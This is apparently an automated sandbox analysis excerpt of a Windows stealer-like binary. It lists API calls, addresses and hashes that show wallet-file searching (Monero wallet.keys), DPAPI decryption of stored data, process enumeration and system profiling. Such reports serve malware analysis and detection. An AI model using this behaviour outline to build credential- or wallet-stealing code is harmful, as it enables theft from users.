                                • API ID: Filelstrcpy$Find$lstrcat$CloseCopyDeleteFirstNextlstrlen
                                • String ID: \*.*
                                • API String ID: 1415058207-1173974218
                                • Opcode ID: 53a8ac0ebf51ccffc92c75c2bbb3505e76ac06ef6c984eea13896f59c2944b6c
                                • Instruction ID: 8bc1e80bfa8c83d8970b91cfc391adb8e92069e2a62ed52f31e94807ecd98ce8
                                • Opcode Fuzzy Hash: 53a8ac0ebf51ccffc92c75c2bbb3505e76ac06ef6c984eea13896f59c2944b6c
                                • Instruction Fuzzy Hash: CF1222719102199BDB55FB60CC9AEEE7B78BF94300F408599B50A620D1EF346F89CF92
                                APIs
                                  • Part of subcall function 0050A740: lstrcpy.KERNEL32(00510E17,00000000), ref: 0050A788
                                  • Part of subcall function 0050A9B0: lstrlen.KERNEL32(?,012D8AC0,?,\Monero\wallet.keys,00510E17), ref: 0050A9C5
                                  • Part of subcall function 0050A9B0: lstrcpy.KERNEL32(00000000), ref: 0050AA04
                                  • Part of subcall function 0050A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 0050AA12
                                  • Part of subcall function 0050A8A0: lstrcpy.KERNEL32(?,00510E17), ref: 0050A905
                                • FindFirstFileA.KERNEL32(00000000,?,00000000,?,\*.*,00510C2E), ref: 004FDE5E
                                • StrCmpCA.SHLWAPI(?,005114C8), ref: 004FDEAE
                                • StrCmpCA.SHLWAPI(?,005114CC), ref: 004FDEC4
                                • FindNextFileA.KERNEL32(000000FF,?), ref: 004FE3E0
                                • FindClose.KERNEL32(000000FF), ref: 004FE3F2
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.2143466660.00000000004F1000.00000040.00000001.01000000.00000003.sdmp, Offset: 004F0000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_4f0000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: Findlstrcpy$File$CloseFirstNextlstrcatlstrlen
                                • String ID: \*.*
                                • API String ID: 2325840235-1173974218
                                • Opcode ID: 8a9c8e61f914a99f6dd56c9a3206277426b1c92d9e8f06000ac5e9c9978de176
                                • Instruction ID: 6a59c04a57c198ff129662c46e7ff885830b2a5f9cd9823f11beec4b501eae30
                                • Opcode Fuzzy Hash: 8a9c8e61f914a99f6dd56c9a3206277426b1c92d9e8f06000ac5e9c9978de176
                                • Instruction Fuzzy Hash: 05F1B1719102199ADB15FB60CC9AEEE7738BF94300F8085D9B50A620D1EF746F8ACF56
                                APIs
                                  • Part of subcall function 0050A740: lstrcpy.KERNEL32(00510E17,00000000), ref: 0050A788
                                  • Part of subcall function 0050A920: lstrcpy.KERNEL32(00000000,?), ref: 0050A972
                                  • Part of subcall function 0050A920: lstrcat.KERNEL32(00000000), ref: 0050A982
                                  • Part of subcall function 0050A9B0: lstrlen.KERNEL32(?,012D8AC0,?,\Monero\wallet.keys,00510E17), ref: 0050A9C5
                                  • Part of subcall function 0050A9B0: lstrcpy.KERNEL32(00000000), ref: 0050AA04
                                  • Part of subcall function 0050A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 0050AA12
                                  • Part of subcall function 0050A8A0: lstrcpy.KERNEL32(?,00510E17), ref: 0050A905
                                • FindFirstFileA.KERNEL32(00000000,?,00000000,?,?,?,005114B0,00510C2A), ref: 004FDAEB
                                • StrCmpCA.SHLWAPI(?,005114B4), ref: 004FDB33
                                • StrCmpCA.SHLWAPI(?,005114B8), ref: 004FDB49
                                • FindNextFileA.KERNEL32(000000FF,?), ref: 004FDDCC
                                • FindClose.KERNEL32(000000FF), ref: 004FDDDE
                                Memory Dump Source
                                • Source File: 00000000.00000002.2143466660.00000000004F1000.00000040.00000001.01000000.00000003.sdmp, Offset: 004F0000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_4f0000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: lstrcpy$Find$Filelstrcat$CloseFirstNextlstrlen
                                • String ID:
                                • API String ID: 3334442632-0
                                • Opcode ID: a1faf237f5c729a97964cc47a05438fc8e5a12235bd016b1fef3384e864afc72
                                • Instruction ID: 4bc52faa628488f5ead158d8e8bde2695461604e57deabaf2ea370117e8918e3
                                • Opcode Fuzzy Hash: a1faf237f5c729a97964cc47a05438fc8e5a12235bd016b1fef3384e864afc72
                                • Instruction Fuzzy Hash: 91916472900209A7DB14FB70DC9ADFD777DBFD4300F40C659B90696185EE38AB098B96
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.2143625399.000000000074E000.00000040.00000001.01000000.00000003.sdmp, Offset: 004F0000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_4f0000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID:
                                • String ID: !Dp6$3{N$4D;?$7s?o$N;?$\9_$]r6u$j#$zs
                                • API String ID: 0-2514805122
                                • Opcode ID: 96a34087d60d4d6e6a54565933b1fe230f5be2e441158eaef01ea288a016802e
                                • Instruction ID: 8c9ed64d594028ca59da0d524dd6a663393cb2ed7e10da2adcd139c524d84522
                                • Opcode Fuzzy Hash: 96a34087d60d4d6e6a54565933b1fe230f5be2e441158eaef01ea288a016802e
                                • Instruction Fuzzy Hash: DCB229F3A0C2149FE3146E2DEC4567ABBE9EFD4720F1A493DEAC4C3740E63598018696
                                APIs
                                  • Part of subcall function 0050A740: lstrcpy.KERNEL32(00510E17,00000000), ref: 0050A788
                                • GetKeyboardLayoutList.USER32(00000000,00000000,005105AF), ref: 00507BE1
                                • LocalAlloc.KERNEL32(00000040,?), ref: 00507BF9
                                • GetKeyboardLayoutList.USER32(?,00000000), ref: 00507C0D
                                • GetLocaleInfoA.KERNEL32(?,00000002,?,00000200), ref: 00507C62
                                • LocalFree.KERNEL32(00000000), ref: 00507D22
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.2143466660.00000000004F1000.00000040.00000001.01000000.00000003.sdmp, Offset: 004F0000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_4f0000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: KeyboardLayoutListLocal$AllocFreeInfoLocalelstrcpy
                                • String ID: /
                                • API String ID: 3090951853-4001269591
                                • Opcode ID: 99adabec429bea8a84424d37266fb85a94421799597e68ab5552c326bff31a21
                                • Instruction ID: ed81176a3b3ae6ac4ed9bea0557e2b677a7cee94f713a51143e7323ad8679dfa
                                • Opcode Fuzzy Hash: 99adabec429bea8a84424d37266fb85a94421799597e68ab5552c326bff31a21
                                • Instruction Fuzzy Hash: F6414A7194021CABDB24DB94DC99BEEBBB8FF58700F208599E409621D1DB742F85CFA1
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.2143625399.000000000074E000.00000040.00000001.01000000.00000003.sdmp, Offset: 004F0000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_4f0000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID:
                                • String ID: *.}$0nJ!$P4\$|tK$3%e${c~$}
                                • API String ID: 0-3869705807
                                • Opcode ID: d73412e69f40caa4d10d66fc08eddc100e22e1f446c11edcb36d713a4ef415a4
                                • Instruction ID: bb636b21e270db9b770f38280e4f8f396c40b8ce1b600d4fb1cf1ff9f98449cb
                                • Opcode Fuzzy Hash: d73412e69f40caa4d10d66fc08eddc100e22e1f446c11edcb36d713a4ef415a4
                                • Instruction Fuzzy Hash: 29B205F3A0C6049FE3086E2DEC4567ABBE5EFD4720F16493DE6C5C3344EA3598058696
                                APIs
                                  • Part of subcall function 0050A740: lstrcpy.KERNEL32(00510E17,00000000), ref: 0050A788
                                  • Part of subcall function 0050A920: lstrcpy.KERNEL32(00000000,?), ref: 0050A972
                                  • Part of subcall function 0050A920: lstrcat.KERNEL32(00000000), ref: 0050A982
                                  • Part of subcall function 0050A9B0: lstrlen.KERNEL32(?,012D8AC0,?,\Monero\wallet.keys,00510E17), ref: 0050A9C5
                                  • Part of subcall function 0050A9B0: lstrcpy.KERNEL32(00000000), ref: 0050AA04
                                  • Part of subcall function 0050A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 0050AA12
                                  • Part of subcall function 0050A8A0: lstrcpy.KERNEL32(?,00510E17), ref: 0050A905
                                • FindFirstFileA.KERNEL32(00000000,?,00000000,?,?,?,\*.*,00510D73), ref: 004FE4A2
                                • StrCmpCA.SHLWAPI(?,005114F8), ref: 004FE4F2
                                • StrCmpCA.SHLWAPI(?,005114FC), ref: 004FE508
                                • FindNextFileA.KERNEL32(000000FF,?), ref: 004FEBDF
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.2143466660.00000000004F1000.00000040.00000001.01000000.00000003.sdmp, Offset: 004F0000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_4f0000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: lstrcpy$FileFindlstrcat$FirstNextlstrlen
                                • String ID: \*.*
                                • API String ID: 433455689-1173974218
                                • Opcode ID: ee48d121a288d2bc4d432c4e15b04aab921c6ff2ff42d7c8682cbc480efd7fd0
                                • Instruction ID: 41584b4346aaa313e5584bdfdf10f56c408d91719a42f8755e7320c1651b627a
                                • Opcode Fuzzy Hash: ee48d121a288d2bc4d432c4e15b04aab921c6ff2ff42d7c8682cbc480efd7fd0
                                • Instruction Fuzzy Hash: D91230719102199ADB14FB60DD9AEEE7738BFD4300F4085A9B50A960D1EF346F49CF92
                                APIs
                                • CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,NO,00000000,00000000), ref: 004F9AEF
                                • LocalAlloc.KERNEL32(00000040,?,?,?,004F4EEE,00000000,?), ref: 004F9B01
                                • CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,NO,00000000,00000000), ref: 004F9B2A
                                • LocalFree.KERNEL32(?,?,?,?,004F4EEE,00000000,?), ref: 004F9B3F
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.2143466660.00000000004F1000.00000040.00000001.01000000.00000003.sdmp, Offset: 004F0000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_4f0000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: BinaryCryptLocalString$AllocFree
                                • String ID: NO
                                • API String ID: 4291131564-1822992918
                                • Opcode ID: b25654791a96f8f7ba9418fc118759afcb0820e6369193ff9bf352246954754e
                                • Instruction ID: 78aa6a58be1c11716273f122eec6bed8841a3913449b127a39accbf5f8146974
                                • Opcode Fuzzy Hash: b25654791a96f8f7ba9418fc118759afcb0820e6369193ff9bf352246954754e
                                • Instruction Fuzzy Hash: 2511A2B4640208BFEB10CF64DC95FAA77B5FB89701F208059FA159B3D0C7B6A901CB94
                                APIs
                                • lstrlen.KERNEL32(?,00000001,?,00000000,00000000,00000000), ref: 004FC871
                                • CryptStringToBinaryA.CRYPT32(?,00000000), ref: 004FC87C
                                • lstrcat.KERNEL32(?,00510B46), ref: 004FC943
                                • lstrcat.KERNEL32(?,00510B47), ref: 004FC957
                                • lstrcat.KERNEL32(?,00510B4E), ref: 004FC978
                                Memory Dump Source
                                • Source File: 00000000.00000002.2143466660.00000000004F1000.00000040.00000001.01000000.00000003.sdmp, Offset: 004F0000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_4f0000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: lstrcat$BinaryCryptStringlstrlen
                                • String ID:
                                • API String ID: 189259977-0
                                • Opcode ID: a62dabc368872fd426ce9d06c225504dcca28217392547d5ce0ca0830ee79ae6
                                • Instruction ID: 5bd7de3ffe24412aca5afb8f9ab6e889db1183b6e0a1874122792d8bc92c71fe
                                • Opcode Fuzzy Hash: a62dabc368872fd426ce9d06c225504dcca28217392547d5ce0ca0830ee79ae6
                                • Instruction Fuzzy Hash: A44174B590420DEBDB10CFA4CD8AFFEB7B8BB44305F1081A8E509A7280D7785A85CF95
                                APIs
                                • GetSystemTime.KERNEL32(?), ref: 0050696C
                                • sscanf.NTDLL ref: 00506999
                                • SystemTimeToFileTime.KERNEL32(?,00000000), ref: 005069B2
                                • SystemTimeToFileTime.KERNEL32(?,00000000), ref: 005069C0
                                • ExitProcess.KERNEL32 ref: 005069DA
                                Memory Dump Source
                                • Source File: 00000000.00000002.2143466660.00000000004F1000.00000040.00000001.01000000.00000003.sdmp, Offset: 004F0000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_4f0000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: Time$System$File$ExitProcesssscanf
                                • String ID:
                                • API String ID: 2533653975-0
                                • Opcode ID: f0ab311cc5863e9de229e8e9855f73b536ca373216bce24caa4337b96f88688c
                                • Instruction ID: 48726d713f10e2ff15be96fd0b90e7499accbc5828d18a7c9d32c76cee837199
                                • Opcode Fuzzy Hash: f0ab311cc5863e9de229e8e9855f73b536ca373216bce24caa4337b96f88688c
                                • Instruction Fuzzy Hash: 3C21CB75D14209ABDF04EFE4D946AEEBBB5BF48301F04852AE406E3250EB349615CB69
                                APIs
                                • GetProcessHeap.KERNEL32(00000008,00000400), ref: 004F724D
                                • RtlAllocateHeap.NTDLL(00000000), ref: 004F7254
                                • CryptUnprotectData.CRYPT32(?,00000000,00000000,00000000,00000000,00000001,?), ref: 004F7281
                                • WideCharToMultiByte.KERNEL32(00000000,00000000,?,?,?,00000400,00000000,00000000), ref: 004F72A4
                                • LocalFree.KERNEL32(?), ref: 004F72AE
                                Memory Dump Source
                                • Source File: 00000000.00000002.2143466660.00000000004F1000.00000040.00000001.01000000.00000003.sdmp, Offset: 004F0000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_4f0000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: Heap$AllocateByteCharCryptDataFreeLocalMultiProcessUnprotectWide
                                • String ID:
                                • API String ID: 2609814428-0
                                • Opcode ID: fca1ff0af9f47283d56733f9fd033b2cf8b86ebd9f7c512644b95b4159394a31
                                • Instruction ID: 03dcf60bff0ae70dde8061d0ce8f31f0e46e538ec4541b61954b477323bf5e34
                                • Opcode Fuzzy Hash: fca1ff0af9f47283d56733f9fd033b2cf8b86ebd9f7c512644b95b4159394a31
                                • Instruction Fuzzy Hash: 4E011675A40208BBEB10DFD4DD46F9D7778FB44701F108555F745BB2C0D674AA018B69
                                APIs
                                • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 0050961E
                                • Process32First.KERNEL32(00510ACA,00000128), ref: 00509632
                                • Process32Next.KERNEL32(00510ACA,00000128), ref: 00509647
                                • StrCmpCA.SHLWAPI(?,00000000), ref: 0050965C
                                • CloseHandle.KERNEL32(00510ACA), ref: 0050967A
                                Memory Dump Source
                                • Source File: 00000000.00000002.2143466660.00000000004F1000.00000040.00000001.01000000.00000003.sdmp, Offset: 004F0000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_4f0000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: Process32$CloseCreateFirstHandleNextSnapshotToolhelp32
                                • String ID:
                                • API String ID: 420147892-0
                                • Opcode ID: aaf3490c96ed2144070fe35ad768d813e3ad3c5711f59f2b92dda7ce074e2ac0
                                • Instruction ID: b77e9fee802eb73c8460e49ddc44294c313fb80e592526b250ef39bf7974e9ef
                                • Opcode Fuzzy Hash: aaf3490c96ed2144070fe35ad768d813e3ad3c5711f59f2b92dda7ce074e2ac0
                                • Instruction Fuzzy Hash: 65011E75A00208FBDB15DFA5CD89BEDBBF8FB48701F108598A945A7290DB359B40CF51
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.2143625399.000000000074E000.00000040.00000001.01000000.00000003.sdmp, Offset: 004F0000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_4f0000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID:
                                • String ID: B?|$B/$B/$}
                                • API String ID: 0-2871083107
                                • Opcode ID: 371c34650fbed205c5dc2ef1708608bf1a92e1b339d28660d558b97c96a2acec
                                • Instruction ID: 4f5430a1a6aeb31fd21b6b42681946e06579073e5a41e711ef39c6a85a0f4bc1
                                • Opcode Fuzzy Hash: 371c34650fbed205c5dc2ef1708608bf1a92e1b339d28660d558b97c96a2acec
                                • Instruction Fuzzy Hash: BAB209F360C2109FE314AE29EC8577ABBE9EFD4320F16853DEAC487744EA3558058796
                                APIs
                                • CryptBinaryToStringA.CRYPT32(00000000,004F5184,40000001,00000000,00000000,?,004F5184), ref: 00508EC0
                                Memory Dump Source
                                • Source File: 00000000.00000002.2143466660.00000000004F1000.00000040.00000001.01000000.00000003.sdmp, Offset: 004F0000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_4f0000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: BinaryCryptString
                                • String ID:
                                • API String ID: 80407269-0
                                • Opcode ID: 3e0e41810828d1c01afd6e25d449560eb4165b5df8f811b62d4da51adf814a52
                                • Instruction ID: 89af44165c31045e741a34acf0fdff6df8d0501635eaed7dd039833ae19e5089
                                • Opcode Fuzzy Hash: 3e0e41810828d1c01afd6e25d449560eb4165b5df8f811b62d4da51adf814a52
                                • Instruction Fuzzy Hash: BF110670200209FFDB00CF64D889FBB3BA9BF89301F109848F9998B290DB35E841DB64
                                APIs
                                • GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,00000000,00000000,?,012DD9C8,00000000,?,00510E10,00000000,?,00000000,00000000), ref: 00507A63
                                • RtlAllocateHeap.NTDLL(00000000), ref: 00507A6A
                                • GetTimeZoneInformation.KERNEL32(?,?,?,?,00000000,00000000,?,012DD9C8,00000000,?,00510E10,00000000,?,00000000,00000000,?), ref: 00507A7D
                                • wsprintfA.USER32 ref: 00507AB7
                                Memory Dump Source
                                • Source File: 00000000.00000002.2143466660.00000000004F1000.00000040.00000001.01000000.00000003.sdmp, Offset: 004F0000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_4f0000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: Heap$AllocateInformationProcessTimeZonewsprintf
                                • String ID:
                                • API String ID: 3317088062-0
                                • Opcode ID: fd4302b99224692a6661e54e9f2f9e3ad823ad17041dc2206a4f5e6d2223a2f9
                                • Instruction ID: 9dd93fd42699c86b5f2540f620cb5c7ec33bb1259c0abbc531f1fcca1e47894a
                                • Opcode Fuzzy Hash: fd4302b99224692a6661e54e9f2f9e3ad823ad17041dc2206a4f5e6d2223a2f9
                                • Instruction Fuzzy Hash: 57118EB1E45218EBEB208F54DC4AFA9BB78FB04721F10479AE90A932C0C7781A44CF51
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.2143625399.000000000074E000.00000040.00000001.01000000.00000003.sdmp, Offset: 004F0000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_4f0000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID:
                                • String ID: I9~$rr{$sm=}$vw
                                • API String ID: 0-3258625590
                                • Opcode ID: 12470f9f04a78192ec7a0941ef467c75dc408ecd4c6f769937afb92d980438de
                                • Instruction ID: c45e37c81901a62fcb2c2e584a364fc1897958a6e66743504f46d208d86bff81
                                • Opcode Fuzzy Hash: 12470f9f04a78192ec7a0941ef467c75dc408ecd4c6f769937afb92d980438de
                                • Instruction Fuzzy Hash: 615259F3A08204AFE3046E2DEC8577AFBD9EF94360F2A453DEAC4C7744E57598058692
                                APIs
                                • CoCreateInstance.COMBASE(0050E118,00000000,00000001,0050E108,00000000), ref: 00503758
                                • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,?,00000104), ref: 005037B0
                                Memory Dump Source
                                • Source File: 00000000.00000002.2143466660.00000000004F1000.00000040.00000001.01000000.00000003.sdmp, Offset: 004F0000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_4f0000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: ByteCharCreateInstanceMultiWide
                                • String ID:
                                • API String ID: 123533781-0
                                • Opcode ID: eb8ce42cf297949675eb0c026b713051f6e2a5788a674126358aaca389979887
                                • Instruction ID: 988e730feba0d27ddb82ee3543c66f1c4a6911a667abb190a25704c742d24169
                                • Opcode Fuzzy Hash: eb8ce42cf297949675eb0c026b713051f6e2a5788a674126358aaca389979887
                                • Instruction Fuzzy Hash: DE41EC71A40A189FDB24DB54CC95B9BB7B5BF48702F5081D8E608E72D0E7716E85CF50
                                APIs
                                • CryptUnprotectData.CRYPT32(?,00000000,00000000,00000000,00000000,00000000,?), ref: 004F9B84
                                • LocalAlloc.KERNEL32(00000040,00000000), ref: 004F9BA3
                                • LocalFree.KERNEL32(?), ref: 004F9BD3
                                Memory Dump Source
                                • Source File: 00000000.00000002.2143466660.00000000004F1000.00000040.00000001.01000000.00000003.sdmp, Offset: 004F0000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_4f0000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: Local$AllocCryptDataFreeUnprotect
                                • String ID:
                                • API String ID: 2068576380-0
                                • Opcode ID: 839a415059a3eb7ec3dfd13f79034a9c3b38cd1ddfa10d016790ba9564a8e601
                                • Instruction ID: 75cdd3926e5456136ef0e9b38e05697b2d0038f6927fcf416427d9ea3ef3b3f1
                                • Opcode Fuzzy Hash: 839a415059a3eb7ec3dfd13f79034a9c3b38cd1ddfa10d016790ba9564a8e601
                                • Instruction Fuzzy Hash: 25110CB4A00209EFDB04DFA4D985EAE77B5FF88301F108569E915A7350D774AE10CF61
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.2143625399.000000000074E000.00000040.00000001.01000000.00000003.sdmp, Offset: 004F0000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_4f0000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID:
                                • String ID: 4xx$9Si$;;o
                                • API String ID: 0-3926094218
                                • Opcode ID: aacc9a527e32f30971218a64ebea836d4b2829a96a5faba2e87a500c4d8e4cb2
                                • Instruction ID: 3e2187ad9fbe78991e7a40e6e467ab0ae5b710b3b94cb6b115e52e4b5ebb3482
                                • Opcode Fuzzy Hash: aacc9a527e32f30971218a64ebea836d4b2829a96a5faba2e87a500c4d8e4cb2
                                • Instruction Fuzzy Hash: D81228F3A082009FE704AE2DEC8576ABBDAEBD4720F1A853DE6C4D7344E53598058797
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.2143625399.000000000074E000.00000040.00000001.01000000.00000003.sdmp, Offset: 004F0000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_4f0000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID:
                                • String ID: <*^$j{
                                • API String ID: 0-19929208
                                • Opcode ID: efc442492b60239f380233a04df0a66112e666908b0961fc2647ee9da904fc93
                                • Instruction ID: fed23d1266e9083e37858b983b91163eadde8995b3039569405abf09525abc3e
                                • Opcode Fuzzy Hash: efc442492b60239f380233a04df0a66112e666908b0961fc2647ee9da904fc93
                                • Instruction Fuzzy Hash: D8B2E7F360C204AFE708AE2DEC8567AB7E9EF94320F16453DE6C5C3744EA3598058697
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.2143625399.000000000074E000.00000040.00000001.01000000.00000003.sdmp, Offset: 004F0000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_4f0000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID:
                                • String ID: bw{}
                                • API String ID: 0-61486077
                                • Opcode ID: efc0a2a6b928bef3fb8a41e71a92fae694fa08a66b84eb0ebcd00c5d9aa2c192
                                • Instruction ID: 3964aeb77f6ffa88c99ecbfb6d4d21be1a924da963fd428b4a1bf00bd16253af
                                • Opcode Fuzzy Hash: efc0a2a6b928bef3fb8a41e71a92fae694fa08a66b84eb0ebcd00c5d9aa2c192
                                • Instruction Fuzzy Hash: F09209F3A0C2049FE3046E2DEC8567AF7E5EF94720F1A893DEAC5C3744E63598058696
                                APIs
                                  • Part of subcall function 0050A740: lstrcpy.KERNEL32(00510E17,00000000), ref: 0050A788
                                  • Part of subcall function 0050A920: lstrcpy.KERNEL32(00000000,?), ref: 0050A972
                                  • Part of subcall function 0050A920: lstrcat.KERNEL32(00000000), ref: 0050A982
                                  • Part of subcall function 0050A9B0: lstrlen.KERNEL32(?,012D8AC0,?,\Monero\wallet.keys,00510E17), ref: 0050A9C5
                                  • Part of subcall function 0050A9B0: lstrcpy.KERNEL32(00000000), ref: 0050AA04
                                  • Part of subcall function 0050A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 0050AA12
                                  • Part of subcall function 0050A8A0: lstrcpy.KERNEL32(?,00510E17), ref: 0050A905
                                • FindFirstFileA.KERNEL32(00000000,?,00000000,?,?,?,005115B8,00510D96), ref: 004FF71E
                                • StrCmpCA.SHLWAPI(?,005115BC), ref: 004FF76F
                                • StrCmpCA.SHLWAPI(?,005115C0), ref: 004FF785
                                • FindNextFileA.KERNEL32(000000FF,?), ref: 004FFAB1
                                • FindClose.KERNEL32(000000FF), ref: 004FFAC3
                                Memory Dump Source
                                • Source File: 00000000.00000002.2143466660.00000000004F1000.00000040.00000001.01000000.00000003.sdmp, Offset: 004F0000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_4f0000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: lstrcpy$Find$Filelstrcat$CloseFirstNextlstrlen
                                • String ID:
                                • API String ID: 3334442632-0
                                • Opcode ID: 03346336898d7fd02173019d7da5bfbb6c38d6decdd15793050de163f285a64b
                                • Instruction ID: 776d00acc2d1a53c1556232a0d7a74744868af3cff6c7c2609c4a89626e47ae0
                                • Opcode Fuzzy Hash: 03346336898d7fd02173019d7da5bfbb6c38d6decdd15793050de163f285a64b
                                • Instruction Fuzzy Hash: 4E11577180064EABDB14FB70DC59EED7B78BF50300F5086AAA51A564D2EF342B4ACB52
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.2143625399.000000000074E000.00000040.00000001.01000000.00000003.sdmp, Offset: 004F0000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_4f0000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID:
                                • String ID: ixv$
                                • API String ID: 0-2028889308
                                • Opcode ID: 401acf7d5fb588d4ea7aeaf94c7e864f8cb27a28fb0cda1148a39fce39dcde23
                                • Instruction ID: cceff30dccee5413d8a839dd970fa92ef4919fa2c5cbb1d895c910e91776862b
                                • Opcode Fuzzy Hash: 401acf7d5fb588d4ea7aeaf94c7e864f8cb27a28fb0cda1148a39fce39dcde23
                                • Instruction Fuzzy Hash: B55128F3B086045BE3185D6DEC8177AB3D6EBC4320F1AC23DEA8597784EC7A58054195
                                Memory Dump Source
                                • Source File: 00000000.00000002.2143625399.00000000008CC000.00000040.00000001.01000000.00000003.sdmp, Offset: 004F0000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_4f0000_file.jbxd
                                Yara matches
                                Similarity
                                • Opcode ID: 825cdc6fccd06d50b4a8585fab0e8c9702d7ddb71e5aeced2edc31fb78bd518f
                                • Instruction ID: fc3ba9aa0468bd69bda4014ce053e860ef557f3fb425018bef5fd5a36c19c7c4
                                • Opcode Fuzzy Hash: 825cdc6fccd06d50b4a8585fab0e8c9702d7ddb71e5aeced2edc31fb78bd518f
                                • Instruction Fuzzy Hash: 9961B0B251C604DFE3097A18ECA177AB7E5EB54320F261E3EE68387350EA3958509787
                                Memory Dump Source
                                • Source File: 00000000.00000002.2143625399.000000000074E000.00000040.00000001.01000000.00000003.sdmp, Offset: 004F0000, based on PE: true
                                Yara matches
                                Similarity
                                • Opcode ID: b240f8640c301a1905b053480c9f24ee75d1152774a7e7b8f328faa6ac90135c
                                • Instruction ID: 2d17e90056ff6abb3757f5cf550a82ac918ac53d958a1b9ed3ecdd9e7a90f0aa
                                • Opcode Fuzzy Hash: b240f8640c301a1905b053480c9f24ee75d1152774a7e7b8f328faa6ac90135c
                                • Instruction Fuzzy Hash: 856128B3A082049FE304AE39DD4577AFBDADFC4320F16893EEA84C7784E93558458796
                                Memory Dump Source
                                • Source File: 00000000.00000002.2143625399.000000000074E000.00000040.00000001.01000000.00000003.sdmp, Offset: 004F0000, based on PE: true
                                Yara matches
                                Similarity
                                • Opcode ID: 52072a0922a5c2bf3bea7f93a85580848ea8e7151ba165b5a7d7d49a125441f3
                                • Instruction ID: c4c79261735de8b92236a7d499a3d1a7449423a9999104e6d50fad2a28a79168
                                • Opcode Fuzzy Hash: 52072a0922a5c2bf3bea7f93a85580848ea8e7151ba165b5a7d7d49a125441f3
                                • Instruction Fuzzy Hash: EE519BF3A082105FE7046E2DEC5177BB7EADBD4220F2A813DE9C893344F9355C024296
                                Memory Dump Source
                                • Source File: 00000000.00000002.2143625399.00000000008CC000.00000040.00000001.01000000.00000003.sdmp, Offset: 004F0000, based on PE: true
                                Yara matches
                                Similarity
                                • Opcode ID: 0e681af7c328c4f70d106cd5d8dc82e5e1c26ec69cd52a4ff77db2df0806c342
                                • Instruction ID: 31bf7dbb641dad261e574403141abc75368a87c447235ec2339f465464208a22
                                • Opcode Fuzzy Hash: 0e681af7c328c4f70d106cd5d8dc82e5e1c26ec69cd52a4ff77db2df0806c342
                                • Instruction Fuzzy Hash: CA517BB210C608CFC3046E28DC5563AB7E5EBD2710F22493DD6C247B01FBB9185596C7
                                Memory Dump Source
